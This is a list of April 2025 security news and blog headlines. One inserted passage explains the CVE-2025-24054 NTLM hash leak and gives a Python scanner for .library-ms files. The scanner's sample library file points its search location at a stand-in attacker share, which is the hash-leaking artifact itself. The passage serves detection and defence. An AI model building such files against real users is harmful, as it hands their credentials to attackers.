19.4.25 | Threat actors misuse Node.js to deliver malware and other malicious payloads | Since October 2024, Microsoft Defender Experts has observed and helped multiple customers address campaigns leveraging Node.js to deliver malware and other payloads that ultimately lead to information theft and data exfiltration. | Malware blog | Microsoft blog |
19.4.25 | ZDI-23-1527 and ZDI-23-1528: The Potential Impact of Overly Permissive SAS Tokens on PC Manager Supply Chains | In ZDI-23-1527 and ZDI-23-1528 we uncover two possible scenarios where attackers could have compromised the Microsoft PC Manager supply chain. | Vulnerability blog | Trend Micro |
19.4.25 | BPFDoor’s Hidden Controller Used Against Asia, Middle East Targets | A controller linked to BPF backdoor can open a reverse shell, enabling deeper infiltration into compromised networks. Recent attacks have been observed targeting the telecommunications, finance, and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia, and Egypt. | Malware blog | Trend Micro |
19.4.25 | Incomplete NVIDIA Patch to CVE-2024-0132 Exposes AI Infrastructure and Data to Critical Risks | A previously disclosed vulnerability in NVIDIA Container Toolkit has an incomplete patch, which, if exploited, could put a wide range of AI infrastructure and sensitive data at risk. | Vulnerability blog | Trend Micro |
19.4.25 | Top 10 for LLM & Gen AI Project Ranked by OWASP | Trend Micro has become a Gold sponsor of the OWASP Top 10 for LLM and Gen AI Project, merging cybersecurity expertise with OWASP's collaborative efforts to address emerging AI security risks. This partnership underscores Trend Micro's unwavering commitment to advancing AI security, ensuring a secure foundation for the transformative power of AI. | AI blog | Trend Micro |
19.4.25 | CrazyHunter Campaign Targets Taiwanese Critical Sectors | This blog entry details research on emerging ransomware group CrazyHunter, which has launched a sophisticated campaign aimed at Taiwan's essential services. | Ransom blog | Trend Micro |
19.4.25 | Nova RaaS: The Ransomware That ‘Spares’ Schools and Nonprofits—For Now | A new ransomware group calling themselves Nova RaaS, or ransomware-as-a-service, has been active for the past month distributing RaLord ransomware. On their blog, they claim to have no affiliations with other cybercriminal groups—and, in a surprising twist, say they’ve pledged not to target schools or nonprofit organizations. | Ransom blog | SonicWall |
19.4.25 | CVE-2025-29927: Next.js Middleware Can Be Bypassed with Crafted Header | The SonicWall Capture Labs threat research team became aware of an authorization bypass vulnerability in Next.js, assessed its impact, and developed mitigation measures. Next.js is a React framework designed to simplify building web applications, focusing on performance, SEO, and ease of use. It provides features like server-side rendering (SSR), static site generation (SSG), and automatic code splitting, making it a popular choice for building fast and scalable web applications. | Vulnerability blog | SonicWall |
19.4.25 | Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis | In December 2024, we uncovered an attack chain that employs distinct, multi-layered stages to deliver malware like Agent Tesla variants, Remcos RAT or XLoader. Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes, and ensure successful payload delivery and execution. The phishing campaign we analyzed used deceptive emails posing as an order release request to deliver a malicious attachment. | Malware blog | Palo Alto |
19.4.25 | Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware | Slow Pisces (aka Jade Sleet, TraderTraitor, PUKCHONG) is a North Korean state-sponsored threat group primarily focused on generating revenue for the DPRK regime, typically by targeting large organizations in the cryptocurrency sector. This article analyzes their campaign that we believe is connected to recent cryptocurrency heists. | APT blog | Palo Alto |
19.4.25 | CVE-2025-24054, NTLM Exploit in the Wild | CVE-2025-24054 is a vulnerability related to NTLM hash disclosure via spoofing, which can be exploited using a maliciously crafted .library-ms file. Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems. Although Microsoft released a patch on March 11, 2025, threat actors had over a week to develop and deploy exploits before the vulnerability began to be actively abused. | Vulnerability blog | Checkpoint |
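Both the BleepingComputer item on the NTLM hash leak and the Check Point write-up above come down to one artifact: a .library-ms file, which is XML, whose `<simpleLocation><url>` points at an attacker-controlled UNC share; Explorer resolves that location with little or no user interaction, the client authenticates to the share over SMB, and that is where the NTLM hash leaves the machine. The scanner below is an added example, not Check Point's detection and not the exploit: it extracts every UNC or file:// host declared in a library file and keeps the ones that are not local. The sample file and its host names are constructed, and treating bare single-label names as internal is an assumption.

```python
"""Flag .library-ms files whose search locations point at a remote share.

Added example; not Check Point's detection and not the exploit itself.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET
from typing import List

NS = "{http://schemas.microsoft.com/windows/2009/library}"
UNC = re.compile(r"^\\\\([^\\/]+)")     # \\host\share... -> host


def host_of(url: str) -> str:
    """Host part of a UNC or file:// location; '' for local paths and other schemes."""
    match = UNC.match(url)
    if match:
        return match.group(1)
    if url.lower().startswith("file://"):
        return url[len("file://"):].split("/", 1)[0]   # file:///C:/... yields ''
    return ""


def is_local(host: str) -> bool:
    """Loopback, RFC 1918/link-local addresses and bare single-label names count as internal."""
    name = host.lower().strip("[]")
    if name == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(name)
    except ValueError:
        return "." not in name            # assumption: single-label (NetBIOS-style) names are internal
    return ip.is_loopback or ip.is_private or ip.is_link_local


def remote_locations(xml_bytes: bytes) -> List[str]:
    """Hosts of every non-local search location declared in a .library-ms file."""
    root = ET.fromstring(xml_bytes)
    hosts = []
    for url in root.iter(NS + "url"):
        host = host_of((url.text or "").strip())
        if host and not is_local(host):
            hosts.append(host)
    return hosts


# Constructed sample: one external share (the leak), one local folder, one internal server.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation><url>\\\\share.attacker-example.test\\docs</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\FILESRV01\\public</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    for host in remote_locations(SAMPLE):
        print("external search location:", host)
```

Run it over mail attachments and archive contents (the campaign shipped the file inside ZIPs); a library file that declares any external location has no business arriving by e-mail. Independently of detection, blocking outbound SMB (TCP 445) at the perimeter stops the hash from reaching the attacker even when the file is opened.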
19.4.25 | Renewed APT29 Phishing Campaign Against European Diplomats | Check Point Research has been tracking an advanced phishing campaign conducted by APT29, a Russia linked threat group, which is targeting diplomatic entities across Europe. | APT blog | Checkpoint |
19.4.25 | Waiting Thread Hijacking: A Stealthier Version of Thread Execution Hijacking | Process Injection is one of the important techniques in the attackers’ toolkit. In the constant cat-and-mouse game, attackers try to invent its new implementations that bypass defenses, using creative methods and lesser-known APIs. | Hacking blog | Checkpoint |
19.4.25 | Care what you share | In this week’s newsletter, Thorsten muses on how search engines and AI quietly gather your data while trying to influence your buying choices. Explore privacy-friendly alternatives and get the scoop on why it's important to question the platforms you interact with online. | AI blog | Palo Alto |
19.4.25 | Unmasking the new XorDDoS controller and infrastructure | Cisco Talos observed the ongoing global spread of the XorDDoS malware, predominantly targeting the United States, with evidence suggesting Chinese-speaking operators are using sophisticated tools to orchestrate widespread attacks. | Malware blog | Cisco Talos |
19.4.25 | Year in Review: The biggest trends in ransomware | This week, our Year in Review spotlight is on ransomware—where low-profile tactics led to high-impact consequences. Download our 2 page ransomware summary, or watch our 55 second video. | Ransom blog | Palo Alto |
19.4.25 | Eclipse and STMicroelectronics vulnerabilities | Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities found in Eclipse ThreadX and four vulnerabilities in STMicroelectronics. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adh | Vulnerability blog | Cisco Talos |
19.4.25 | CapCut copycats are on the prowl | Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead | AI blog | Eset |
19.4.25 | They’re coming for your data: What are infostealers and how do I stay safe? | Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data | Cyber blog | |
19.4.25 | Attacks on the education sector are surging: How can cyber-defenders respond? | Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk? | Attack blog | |
19.4.25 | From Shadow to Spotlight: The Evolution of LummaStealer and Its Hidden Secrets | This article is a continuation of the previous research published on the malware LummaStealer: "Your Data Is Under New Lummanagement: The Rise of LummaStealer". | Malware blog | Cybereason |
19.4.25 | The Windows Registry Adventure #6: Kernel-mode objects | Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses | Cyber blog | Project Zero |
19.4.25 | Closing the Security Gap From Threat Hunting to Detection Engineering | Learn how to use existing tooling to perform threat hunting and detection engineering to find hidden threats and strengthen your defenses. | Cyber blog | Trelix |
19.4.25 | ASUS Confirms Critical Flaw in AiCloud Routers; Users Urged to Update Firmware | ASUS has disclosed a critical security flaw impacting routers with AiCloud enabled that could permit remote attackers to perform unauthorized execution of functions | Vulnerability | The Hacker News |
19.4.25 | Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 States | Cybersecurity researchers are warning of a "widespread and ongoing" SMS phishing campaign that's been targeting toll road users in the United States for financial theft | Phishing | The Hacker News |
18.4.25 | Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader | A new multi-stage attack has been observed delivering malware families like Agent Tesla variants, Remcos RAT, and XLoader. "Attackers increasingly rely on such | Virus | The Hacker News |
18.4.25 | Experts Uncover New XorDDoS Controller, Infrastructure as Malware Expands to Docker, Linux, IoT | Cybersecurity researchers are warning of continued risks posed by a distributed denial-of-service (DDoS) malware known as XorDDoS , with 71.3 percent of the | Virus | The Hacker News |
18.4.25 | CVE-2025-24054 Under Active Attack—Steals NTLM Credentials on File Download | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a medium-severity security flaw impacting Microsoft Windows to its Known | Vulnerability | The Hacker News |
18.4.25 | Mustang Panda Targets Myanmar With StarProxy, EDR Bypass, and TONESHELL Updates | The China-linked threat actor known as Mustang Panda has been attributed to a cyber attack targeting an unspecified organization in Myanmar with previously | APT | The Hacker News |
17.4.25 | State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns | Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to | Virus | The Hacker News |
17.4.25 | Critical Erlang/OTP SSH Vulnerability (CVSS 10.0) Allows Unauthenticated Code Execution | A critical security vulnerability has been disclosed in the Erlang/Open Telecom Platform (OTP) SSH implementation that could permit an attacker to execute arbitrary code without any authentication under certain conditions. | Vulnerability | The Hacker News |
17.4.25 | Node.js Malware Campaign Targets Crypto Users with Fake Binance and TradingView Installers | Microsoft is calling attention to an ongoing malvertising campaign that makes use of Node.js to deliver malicious payloads capable of information theft and data | Virus | The Hacker News |
17.4.25 | CISA Flags Actively Exploited Vulnerability in SonicWall SMA Devices | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a security flaw impacting SonicWall Secure Mobile Access (SMA) 100 | Exploit | The Hacker News |
17.4.25 | Apple Patches Two Actively Exploited iOS Flaws Used in Sophisticated Targeted Attacks | Apple on Wednesday released security updates for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS to address two security flaws that it said have come under | Exploit | The Hacker News |
17.4.25 | New Windows Task Scheduler Bugs Let Attackers Bypass UAC and Tamper with Logs | Cybersecurity researchers have detailed four different vulnerabilities in a core component of the Windows task scheduling service that could be exploited by local | Attack | The Hacker News |
17.4.25 | Google Blocked 5.1B Harmful Ads and Suspended 39.2M Advertiser Accounts in 2024 | Google on Wednesday revealed that it suspended over 39.2 million advertiser accounts in 2024, with a majority of them identified and blocked by its systems | Cyber | The Hacker News |
16.4.25 | Gamma AI Platform Abused in Phishing Chain to Spoof Microsoft SharePoint Logins | Threat actors are leveraging an artificial intelligence (AI) powered presentation platform named Gamma in phishing attacks to direct unsuspecting users to | AI | The Hacker News |
16.4.25 | New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks | Cybersecurity researchers have unearthed a new controller component associated with a known backdoor called BPFDoor as part of cyber attacks targeting | Virus | The Hacker News |
16.4.25 | Chinese Android Phones Shipped with Fake WhatsApp, Telegram Apps Targeting Crypto Users | Cheap Android smartphones manufactured by Chinese companies have been observed pre-installed with trojanized apps masquerading as WhatsApp and | Cryptocurrency | The Hacker News |
16.4.25 | U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on Alert | The U.S. government funding for non-profit research giant MITRE to operate and maintain its Common Vulnerabilities and Exposures (CVE) program will expire | BigBrothers | The Hacker News |
16.4.25 | Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool | The China-linked threat actor known as UNC5174 has been attributed to a new campaign that leverages a variant of a known malware dubbed SNOWLIGHT and a | Virus | The Hacker News |
16.4.25 | Critical Apache Roller Vulnerability (CVSS 10.0) Enables Unauthorized Session Persistence | A critical security vulnerability has been disclosed in the Apache Roller open-source, Java-based blogging server software that could allow malicious actors to retain | Vulnerability | The Hacker News |
16.4.25 | Malicious PyPI Package Targets MEXC Trading API to Steal Credentials and Redirect Orders | Cybersecurity researchers have disclosed a malicious package uploaded to the Python Package Index (PyPI) repository that's designed to reroute trading orders | Hack | The Hacker News |
15.4.25 | Majority of Browser Extensions Can Access Sensitive Enterprise Data, New Report Finds | Everybody knows browser extensions are embedded into nearly every user's daily workflow, from spell checkers to GenAI tools. What most IT and security people | Security | The Hacker News |
15.4.25 | Crypto Developers Targeted by Python Malware Disguised as Coding Challenges | The North Korea-linked threat actor assessed to be behind the massive Bybit hack in February 2025 has been linked to a malicious campaign that targets developers | APT | The Hacker News |
15.4.25 | Gladinet's Triofox and CentreStack Under Active Exploitation via Critical RCE Vulnerability | A recently disclosed security flaw in Gladinet CentreStack also impacts its Triofox remote access and collaboration solution, according to Huntress, with seven | Exploit | The Hacker News |
15.4.25 | Meta Resumes E.U. AI Training Using Public User Data After Regulator Approval | Meta has announced that it will begin to train its artificial intelligence (AI) models using public data shared by adults across its platforms in the European Union, | AI | The Hacker News |
15.4.25 | ResolverRAT Campaign Targets Healthcare, Pharma via Phishing and DLL Side-Loading | Cybersecurity researchers have discovered a new, sophisticated remote access trojan called ResolverRAT that has been observed in attacks targeting healthcare | Virus | The Hacker News |
15.4.25 | Phishing Campaigns Use Real-Time Checks to Validate Victim Emails Before Credential Theft | Cybersecurity researchers are calling attention to a new type of credential phishing scheme that ensures that the stolen information is associated with valid online | Phishing | The Hacker News |
15.4.25 | Pakistan-Linked Hackers Expand Targets in India with CurlBack RAT and Spark RAT | A threat actor with ties to Pakistan has been observed targeting various sectors in India with various remote access trojans like Xeno RAT, Spark RAT, and a previously | Virus | The Hacker News |
13.4.25 | Leak confirms OpenAI's GPT 4.1 is coming before GPT 5.0 | OpenAI is working on yet another AI model reportedly called GPT-4.1, a successor to GPT-4o, which is expected to come before GPT 5.0 | AI | BleepingComputer |
13.4.25 | Tycoon2FA phishing kit targets Microsoft 365 with new tricks | Phishing-as-a-service (PhaaS) platform Tycoon2FA, known for bypassing multi-factor authentication on Microsoft 365 and Gmail accounts, has received updates that improve its stealth and evasion capabilities. | Phishing | |
13.4.25 | AI-hallucinated code dependencies become new supply chain risk | A new class of supply chain attacks named 'slopsquatting' has emerged from the increased use of generative AI tools for coding and the model's tendency to "hallucinate" non-existent package names. | AI | BleepingComputer |
13.4.25 | Microsoft Defender will isolate undiscovered endpoints to block attacks | Microsoft is testing a new Defender for Endpoint capability that will block traffic to and from undiscovered endpoints to thwart attackers' lateral network movement attempts. | OS | |
13.4.25 | Western Sydney University discloses security breaches, data leak | Western Sydney University (WSU) announced two security incidents that exposed personal information belonging to members of its community. | Incident | |
13.4.25 | Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks | Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched. | Vulnerability | |
13.4.25 | Microsoft: Windows 'inetpub' folder created by security fix, don’t delete | Microsoft has now confirmed that an April 2025 Windows security update is creating a new empty "inetpub" folder and warned users not to delete it. | OS | |
13.4.25 | Google's AI video generator Veo 2 is rolling out on AI Studio | Google's AI video generator tool Veo 2, which is the company's take on OpenAI's Sora, is now rolling out to some users in the United States. | AI | BleepingComputer |
13.4.25 | US lab testing provider exposed health data of 1.6 million people | Laboratory Services Cooperative (LSC) has released a statement informing that it suffered a data breach in which hackers stole sensitive information of roughly 1.6 million people from its systems. | Incident | BleepingComputer |
13.4.25 | Campaign Targets Amazon EC2 Instance Metadata via SSRF | Discover the latest CVE trends and a new campaign targeting websites hosted on EC2 instances on AWS. | Vulnerability blog | F5 |
13.4.25 | Microsoft says Edge browser is now 9% faster after optimizations | Microsoft claims its Chromium-based Microsoft Edge has seen up to 9% performance improvements following the release of version 134. | OS | |
13.4.25 | Ransomware attack cost IKEA operator in Eastern Europe $23 million | Fourlis Group, the operator of IKEA stores in Greece, Cyprus, Romania, and Bulgaria, has reported that the ransomware attack it suffered just before Black Friday on November 27, 2024, caused losses estimated at €20 million ($22.8M). | Ransom | |
13.4.25 | Hackers exploit WordPress plugin auth bypass hours after disclosure | Hackers started exploiting a high-severity flaw that allows bypassing authentication in the OttoKit (formerly SureTriggers) plugin for WordPress just hours after public disclosure. | Exploit | |
13.4.25 | Microsoft releases emergency update to fix Office 2016 crashes | Microsoft has released an out-of-band Office update to fix a known issue that caused Word, Excel, and Outlook to crash after installing the KB5002700 security update for Office 2016. | OS | |
13.4.25 | OpenAI wants ChatGPT to 'know you over your life' with new Memory update | OpenAI is giving ChatGPT's memory feature its biggest upgrade yet, allowing the AI to know you better by referencing all your past conversations. | AI | BleepingComputer |
13.4.25 | Russian hackers attack Western military mission using malicious drive | The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. | BigBrothers | BleepingComputer |
13.4.25 | Sensata Technologies hit by ransomware attack impacting operations | Sensata Technologies (known as Sensata) suffered a ransomware attack last weekend that encrypted parts of the company network and disrupted operations. | Ransom | BleepingComputer |
13.4.25 | ChatGPT's o4-mini, o4-mini-high and o3 spotted ahead of release | OpenAI is preparing to launch as many as three new AI models, possibly called "o4-mini", "o4-mini-high" and "o3". | AI | BleepingComputer |
13.4.25 | Google takes on Cursor with Firebase Studio, its AI builder for vibe coding | Google has quietly launched Firebase Studio, which is a cloud-based AI-powered integrated development environment that lets you build full-fledged apps using prompts. | AI | BleepingComputer |
13.4.25 | Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials | A targeted campaign exploited Server-Side Request Forgery (SSRF) vulnerabilities in websites hosted on AWS EC2 instances to extract EC2 Metadata, which could include Identity and Access Management (IAM) credentials from the IMDSv1 endpoint. | Hack | BleepingComputer |
13.4.25 | Oracle says "obsolete servers" hacked, denies cloud breach | Oracle finally confirmed in email notifications sent to customers that a hacker stole and leaked credentials from what it described as "two obsolete servers." | Incident | BleepingComputer |
13.4.25 | Windows 11 April update unexpectedly creates new 'inetpub' folder | Microsoft's April 2025 Patch Tuesday updates are strangely creating an empty "inetpub" folder in the root of the C:\ drive, even on systems that do not have Internet Information Services (IIS) installed. | OS | BleepingComputer |
13.4.25 | Critical FortiSwitch flaw lets hackers change admin passwords remotely | Fortinet has released security patches for a critical vulnerability in its FortiSwitch devices that can be exploited to change administrator passwords remotely. | Vulnerability | BleepingComputer |
12.4.25 | CentreStack RCE exploited as zero-day to breach file sharing servers | Hackers exploited a vulnerability in Gladinet CentreStack's secure file-sharing software as a zero-day since March to breach storage servers | Exploit | |
12.4.25 | Who's calling? The threat of AI-powered vishing attacks | AI is making voice phishing (vishing) more dangerous than ever, with scammers cloning voices in seconds to trick employees into handing over their credentials. Learn how to defend your organization with Specops Secure Service Desk. | AI | |
12.4.25 | Microsoft: April 2025 updates break Windows Hello on some PCs | Microsoft says some Windows users might be unable to log into their accounts via Windows Hello after installing the April 2025 security updates. | OS | |
12.4.25 | Phishing kits now vet victims in real-time before stealing credentials | Phishing actors are employing a new evasion tactic called 'Precision-Validated Phishing' that only shows fake login forms when a user enters an email address that the threat actors specifically targeted. | Phishing | |
12.4.25 | Police detain Smokeloader malware customers, seize servers | In follow-up activity for Operation Endgame, law enforcement tracked down the Smokeloader botnet's customers and detained at least five individuals. | Virus | BleepingComputer |
12.4.25 | Fake Microsoft Office add-in tools push malware via SourceForge | Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency. | Virus | BleepingComputer |
12.4.25 | Microsoft fixes auth issues on Windows Server, Windows 11 24H2 | Microsoft has fixed a known issue causing authentication problems when Credential Guard is enabled on systems using the Kerberos PKINIT pre-auth security protocol. | OS | BleepingComputer |
12.4.25 | Microsoft: Windows CLFS zero-day exploited by ransomware gang | Microsoft says the RansomEXX ransomware gang has been exploiting a high-severity zero-day flaw in the Windows Common Log File System to gain SYSTEM privileges on victims' systems. | OS | BleepingComputer |
12.4.25 | Microsoft April 2025 Patch Tuesday fixes exploited zero-day, 134 flaws | Today is Microsoft's April 2025 Patch Tuesday, which includes security updates for 134 flaws, including one actively exploited zero-day vulnerability. | OS | BleepingComputer |
12.4.25 | Windows 10 KB5055518 update fixes random text when printing | Microsoft has released the KB5055518 cumulative update for Windows 10 22H2 and Windows 10 21H2, with nine changes or fixes. | OS | BleepingComputer |
12.4.25 | Windows 11 KB5055523 & KB5055528 cumulative updates released | Microsoft has released Windows 11 KB5055523 and KB5055528 cumulative updates for versions 24H2 and 23H2 to fix security vulnerabilities and issues. | OS | BleepingComputer |
12.4.25 | Hackers lurked in Treasury OCC’s systems since June 2023 breach | Unknown attackers who breached the Treasury's Office of the Comptroller of the Currency (OCC) in June 2023 gained access to over 150,000 emails. | Incident | BleepingComputer |
12.4.25 | WhatsApp flaw can let attackers run malicious code on Windows PCs | Meta warned Windows users to update the WhatsApp messaging app to the latest version to patch a vulnerability that can let attackers execute malicious code on their devices. | Social | BleepingComputer |
12.4.25 | ICS Vulnerability Report: Energy, Manufacturing Device Fixes Urged by Cyble | Multiple industrial control system (ICS) devices are affected by vulnerabilities carrying severity ratings as high as 9.9. | ICS blog | Cyble |
12.4.25 | IT Vulnerability Report: VMware, Microsoft Fixes Urged by Cyble | After investigating recent IT vulnerabilities, Cyble threat researchers identified eight high-priority fixes for security teams. | Vulnerability blog | Cyble |
12.4.25 | Ransomware Attack Levels Remain High as Major Change Looms | March saw a potential leadership shift in ransomware attacks, sustained high attack volumes, and the rise of new threat groups. | Ransom blog | Cyble |
12.4.25 | TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications | Cyble analyzes TsarBot, a newly identified Android banking Trojan that employs overlay attacks to target over 750 banking, financial, and cryptocurrency applications worldwide. | Malware blog | Cyble |
12.4.25 | Hacktivists Increasingly Target France for Its Diplomatic Efforts | Pro-Russian and pro-Palestinian hacktivist groups share a common adversary in France, leading to coordinated cyberattacks against the country. | BigBrother blog | Cyble |
12.4.25 | CVE-2025-24813: Remote Code Execution in Apache Tomcat via Malicious Session Deserialization | Apache Tomcat is a popular, open-source web server and servlet container maintained by the Apache Software Foundation. It provides a reliable and scalable environment for executing Java Servlets... | Vulnerability blog | Seqrite |
12.4.25 | Beware! Fake ‘NextGen mParivahan’ Malware Returns with Enhanced Stealth and Data Theft | Cybercriminals continually refine their tactics, making Android malware more insidious and challenging to detect. A new variant of the fake NextGen mParivahan malware has emerged, following its predecessor’s deceptive strategies but introducing significant enhancements. Previously, attackers exploited the government’s. | Malware blog | Seqrite |
12.4.25 | Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by Multi-Platform Attacks | Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now. | APT blog | Seqrite |
12.4.25 | Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics | Contents: Introduction; Infection Chain; Initial Findings; Campaign 1 (Looking into PDF document); Campaign 2 (Looking into PDF document); Technical Analysis, Campaign 1 & 2; Conclusion; Seqrite Protection; MITRE ATT&CK... | APT blog | Seqrite |
12.4.25 | NEPTUNE RAT: An advanced Windows RAT with System Destruction Capabilities and Password Exfiltration from 270+ Applications | At CYFIRMA, we are committed to providing up-to-date insights into current threats and the tactics used by malicious actors targeting both organizations and individuals. In this report, we will take an in-depth look at the latest version of Neptune RAT, which has been shared on GitHub using a technique involving PowerShell commands: | Malware blog | Cyfirma |
12.4.25 | CYFIRMA INDUSTRY REPORT: MATERIALS INDUSTRY | The CYFIRMA Industry Report delivers original cybersecurity insights and telemetry-driven statistics of global industries, covering one sector each week for a quarter. This report focuses on the materials industry, presenting key trends and statistics in an engaging infographic format. | Cyber blog | Cyfirma |
12.4.25 | TRACKING RANSOMWARE – MARCH 2025 | In March 2025, ransomware attacks targeted critical industries such as Manufacturing, IT, and Healthcare. Notable groups like Black Basta and Moonstone Sleet evolved new strategies, such as automating brute-force VPN attacks and deploying ransomware-as-a-service models. | Ransom blog | Cyfirma |
12.4.25 | Tik-Tok: China’s Digital Weapon System? | U.S. President Donald Trump, once a critic but now a supporter of TikTok, is granting the app’s China-based parent company, ByteDance, a second 75-day extension to finalize a deal that would transfer ownership of TikTok to an American entity. | Social blog | Cyfirma |
12.4.25 | Microsoft Announces New Authentication Requirements for High-Volume Senders | There was a lot of buzz in security and messaging circles at the end of 2023 when Google, Yahoo and Apple jointly announced that they were going to start enforcing strict email authentication requirements for bulk email senders. Although the implementation that started in the first quarter of 2024 has been slow to fully ramp up, momentum is building, and the overall trend towards mandatory email authentication is quite clear. | Safety blog | PROOFPOINT |
12.4.25 | The Expanding Attack Surface: Why Collaboration Tools Are the New Front Line in Cyberattacks | The modern workplace has expanded beyond email. Attackers now exploit collaboration tools, supplier relationships and human trust to bypass defenses and compromise accounts. This five-part blog series raises awareness around these shifting attack tactics. And it introduces our holistic approach to protecting users. | Spam blog | PROOFPOINT |
12.4.25 | Stopping attacks against on-premises Exchange Server and SharePoint Server with AMSI | Exchange Server and SharePoint Server are business-critical assets and considered crown jewels for many organizations, making them attractive targets for attacks. | Attack blog | Microsoft blog |
12.4.25 | Incomplete NVIDIA Patch to CVE-2024-0132 Exposes AI Infrastructure and Data to Critical Risks | A previously disclosed vulnerability in NVIDIA Container Toolkit has an incomplete patch, which, if exploited, could put a wide range of AI infrastructure and sensitive data at risk. | AI blog | |
12.4.25 | CTEM + CREM: Aligning Your Cybersecurity Strategy | Organizations looking to implement CTEM don’t have to start from scratch. CREM can help you get there faster, with actionable insights, automated workflows, and continuous risk reduction. | Cyber blog | |
12.4.25 | GTC 2025: AI, Security & The New Blueprint | From quantum leaps to AI factories, GTC 2025 proved one thing: the future runs on secure foundations. | AI blog | |
12.4.25 | Microsoft Security Bulletin Coverage for April 2025 | Microsoft’s April 2025 Patch Tuesday has 123 vulnerabilities, of which 49 are Elevation of Privilege. SonicWall Capture Labs' threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2025 and has produced coverage for ten of the reported vulnerabilities. | Vulnerability blog | SonicWall |
12.4.25 | How Prompt Attacks Exploit GenAI and How to Fight Back | Palo Alto Networks has released “Securing GenAI: A Comprehensive Report on Prompt Attacks: Taxonomy, Risks, and Solutions,” which surveys emerging prompt-based attacks on AI applications and AI agents. While generative AI (GenAI) has many valid applications for enterprise productivity, there is also potential for critical security vulnerabilities in AI applications and AI agents. | AI blog | Palo Alto |
12.4.25 | Available now: 2024 Year in Review | Download Talos' 2024 Year in Review now, and access key insights on the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. | Cyber blog | Palo Alto |
12.4.25 | Threat actors thrive in chaos | Martin delves into how threat actors exploit chaos, offering insights from Talos' 2024 Year in Review on how to fortify defenses against evolving email lures and frequently targeted vulnerabilities, even amidst economic disruption. | Cyber blog | Palo Alto |
12.4.25 | Unraveling the U.S. toll road smishing scams | Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America. | Spam blog | Palo Alto |
12.4.25 | Microsoft Patch Tuesday for April 2025 — Snort rules and prominent vulnerabilities | Microsoft has released its monthly security update for April 2025, which includes 126 vulnerabilities affecting a range of products, including 11 that Microsoft has marked as “critical”. | Vulnerability blog | Palo Alto |
12.4.25 | Year in Review: Key vulnerabilities, tools, and shifts in attacker email tactics | From Talos' 2024 Year in Review, here are some findings on the top targeted network device vulnerabilities. We also explore how threat actors are moving away from time-sensitive lures in their emails. And finally, we reveal the tools that adversaries most heavily utilized last year. | Cyber blog | Palo Alto |
12.4.25 | One mighty fine-looking report | Hazel highlights the key findings within Cisco Talos’ 2024 Year in Review (now available for download) and details our active tracking of an ongoing campaign targeting users in Ukraine with malicious LNK files. | BigBrother blog | Palo Alto |
12.4.25 | Watch out for these traps lurking in search results | Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results | Cyber blog | Eset |
12.4.25 | So your friend has been hacked: Could you be next? | When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe. | Cyber blog | |
12.4.25 | 1 billion reasons to protect your identity online | Corporate data breaches are a gateway to identity fraud, but they’re not the only one. Here’s a lowdown on how your personal data could be stolen – and how to make sure it isn’t. | Cyber blog | |
